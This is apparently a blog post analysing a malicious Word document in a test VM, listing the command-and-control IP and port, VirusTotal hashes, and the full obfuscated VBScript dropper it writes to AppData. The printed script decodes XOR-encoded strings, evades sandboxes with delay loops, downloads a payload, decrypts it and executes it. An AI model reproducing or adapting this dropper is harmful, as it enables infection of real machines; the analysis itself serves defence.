Damn Malicious Word docs – Part 2

So with the push of the Christmas season upon me and my family, it has taken some time to get back to this. So with that being said, I have come back to it only to find out that the malicious word doc is not working fully at the present time – most likely since the compromised server is no longer up/has been fixed. But here is the little bit that I got from running the word doc.

After running the malicious word doc within my test VM, I could see a call being made to an IP address of 176.107.176.60 on port 10025. Since it has been a while since this email was received, the compromised server has most likely been taken offline or fixed since there is no response as we can see in the PCAP:

Wireshark - No response from server

Wireshark – No response from server

	GET /1.jpg HTTP/1.1
	Accept: */*
	Accept-Encoding: gzip, deflate
	User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
	Host: 176.107.176.60:10025
	Proxy-Connection: Keep-Alive
	

VirusTotal does show a record for this particular IP address as seen below:

VirusTotal: http://www.virustotal.com/en/url/63e556c39ffdf106335aed96e9cc8c26ee29cf8f47a5ecbd64727b53fbe6ced7/analysis/
Detection ratio: 3 / 66
First Submission: 2015-12-15 13:04:13 UTC

It also looks like it creates a new VBS file as well within the “C:\Users\Administrator\AppData\Roaming” folder called “14997.vbs.” VirusTotal did not have this listed in it’s database unfortunately. Here are those results from when I uploaded the file to VT:

MD5: 3b4914287915f961ccc6e3b6eb2631c8
SHA256: d7effb527b7a2dcac770674b66aafd96c35dc52a14542de0bb968c28a259bf40
File size: 3.4KB
VirusTotal: http://www.virustotal.com/en/file/d7effb527b7a2dcac770674b66aafd96c35dc52a14542de0bb968c28a259bf40/analysis/1450624617/
First Submission: 2015-12-20 15:16:57 UTC
Detection ratio: 5 / 55

Here is the script as well:

	Dim UmjIXO2hir, KiaB14or7AP4MJs3N
	sub RvzNM87uD2Uk()
	Dim Q8eF5tz, J1osO1Xdjhm
	For Q8eF5tz = 21 To 2000369
	J1osO1Xdjhm = AQ1rj2btk + 51 + 84 + 86
	Next
	End Sub
	Function PW6zO9Wi2(ImpHrHkWLHm,JG8Z4Kmn2,JFc2vrhu0ju)
	Dim L0A9lV2qvBLzt7I, XZSFk9ykDjRgHCE, DJrH, YxusiNzWR8z, LX9kL, SaZkf()
	Set XZSFk9ykDjRgHCE = CreateObject(P7aXJwQhP("3A05420047331E5F264720590552140E42350C0B7F0B5D221445", "Aif0i7Gw1"))
	Set DJrH = XZSFk9ykDjRgHCE.GEtFILE(ImpHrHkWLHm)
	Set LX9kL = DJrH.oPeNastExtStreaM(1, 0)
	Set YxusiNzWR8z = XZSFk9ykDjRgHCE.CreAtETEXtfiLe(JG8Z4Kmn2, 1, 0)
	L0A9lV2qvBLzt7I = 0
	ReDim SaZkf(Len(JFc2vrhu0ju) - 1)
	For L0A9lV2qvBLzt7I = 0 To UBound(SaZkf)
	SaZkf(L0A9lV2qvBLzt7I) = Asc(Mid(JFc2vrhu0ju, L0A9lV2qvBLzt7I + 1, 1))
	Next
	Do Until LX9kL.aTeNDOFStREAM
	L0A9lV2qvBLzt7I = (L0A9lV2qvBLzt7I + 1) \ (UBound(SaZkf) + 1)
	YxusiNzWR8z.WrIte chr(Asc(LX9kL.REAd(1)) Xor SaZkf(L0A9lV2qvBLzt7I))
	Loop
	YxusiNzWR8z.Close
	LX9kL.Close
	Set LX9kL = Nothing
	Set DJrH = Nothing
	Set YxusiNzWR8z = Nothing
	Set XZSFk9ykDjRgHCE = Nothing
	End Function
	Sub Olep7i7Kiur(MAyxtrNPneQ2NWZ7k)
	Dim ClPZ
	ClPZ = Timer + MAyxtrNPneQ2NWZ7k
	Do While Timer < ClPZ
	Loop
	End Sub
	Sub RcEJWSKV4kbbHw()
	Dim SMb0MjiAHbCa7ncac, NHgJOxl2hir
	Set SMb0MjiAHbCa7ncac = CreateObject(P7aXJwQhP("061524202D33186A1E0704353D", "YQFGRDClDMoa"))
	RvzNM87uD2Uk
	NGhXERANM = WscRIpT.sCriPtNAME
	NGhXERANM = Left(NGhXERANM, Len(NGhXERANM) - (2 + 7 + 2 - 7))
	UmjIXO2hir = SMb0MjiAHbCa7ncac.EXpAndENViRonmENtstRINGS(P7aXJwQhP("5024222503500C1661", "GuERUg1xwD")) & "\" & NGhXERANM
	Set NHgJOxl2hir = CreateObject(P7aXJwQhP("22312A1D373A003E3D41000423101D3B08", "IoX"))
	NHgJOxl2hir.oPEn P7aXJwQhP("2E1363", "FiV704uNs05DkXL"), P7aXJwQhP("3D3B3B03737A607E447F7B7E7F44676478795D7F65757E4379677A6042673F3F28", "IUOOs"), 0
	NHgJOxl2hir.SEnD()
	if NHgJOxl2hir.reADYSTAtE = (2 + 5 + 2 - 5) and NHgJOxl2hir.statuS = (100 + 1 + 100 - 1) then
	RvzNM87uD2Uk
	A9EyFbvfiiPnu NHgJOxl2hir.ReSPONSEBoDy
	end if
	End Sub
	Pxhu5jG3sVJvW
	Function P7aXJwQhP(GicLFzK4z, WuDVCowp4c)
	Dim KED4i4J41QJIrnYE, XCUpD, QbspWznb91
	For KED4i4J41QJIrnYE = 1 To (Len(GicLFzK4z) / 2)
	XCUpD = (Chr(38) & Chr(72) & (Mid(GicLFzK4z, (KED4i4J41QJIrnYE + KED4i4J41QJIrnYE) - 1, 2)))
	QbspWznb91 = (Asc(Mid(WuDVCowp4c, ((KED4i4J41QJIrnYE Mod Len(WuDVCowp4c)) + 1), 1)))
	P7aXJwQhP = P7aXJwQhP + chr(XCUpD Xor QbspWznb91)
	Next
	End Function
	sub Pxhu5jG3sVJvW()
	Dim DOPo6yeQIQ0KMjs, PsGNJpm5ejbM, TlscH7mFdrkHWvBFz
	DOPo6yeQIQ0KMjs = 91255263: PsGNJpm5ejbM = 0: TlscH7mFdrkHWvBFz = 0
	For PsGNJpm5ejbM = 1 To DOPo6yeQIQ0KMjs
	TlscH7mFdrkHWvBFz = TlscH7mFdrkHWvBFz + 1
	Next
	If TlscH7mFdrkHWvBFz = DOPo6yeQIQ0KMjs Then
	Olep7i7Kiur (4)
	RcEJWSKV4kbbHw
	XAwnfxrYiA4
	Else
	MsgBox "87", 16, "17"
	End If
	End Sub
	Sub A9EyFbvfiiPnu(YHT33KI3x4xVelz7)
	Dim Su8OPyfzt4Ku45ua
	Set Su8OPyfzt4Ku45ua = CreateObject(P7aXJwQhP("120738740C6F6102370C2621", "TSCw0NA2vEiGLd"))
	Su8OPyfzt4Ku45ua.opEn
	Su8OPyfzt4Ku45ua.tYpE = 1
	Su8OPyfzt4Ku45ua.WRITe YHT33KI3x4xVelz7
	Su8OPyfzt4Ku45ua.SAVEToFilE UmjIXO2hir, (1 + 5 + 1 - 5)
	Su8OPyfzt4Ku45ua.Close
	Olep7i7Kiur (2)
	KiaB14or7AP4MJs3N = UmjIXO2hir
	UmjIXO2hir = UmjIXO2hir & second(time) & P7aXJwQhP("57521501", "Qy7md1eKE5CxqP")
	PW6zO9Wi2 KiaB14or7AP4MJs3N, UmjIXO2hir, P7aXJwQhP("355100765445", "UT3cGfvjM4")
	End Sub
	Sub XAwnfxrYiA4()
	CreateObject(P7aXJwQhP("60240C2A0769723C192A02245238002905", "G3LiFk")).sHELLexECUte UmjIXO2hir, "", "", P7aXJwQhP("1A43520F", "Nu37aPdZsl"), 1
	End sub
	

I have also gotten a video of the VM when I started running the malicious Word document which you can watch here. The interesting thing about the Word doc is that the script that it creates in the Appdata/Roaming folder has different names when you run it. I noticed this when messing around with VirtualBox and trying to get the video recording setup correctly. The name of the file always changed, but the error that it gave, and the IP/port combination that it tried to contact always stayed the same.

Leave a Reply

Your email address will not be published. Required fields are marked *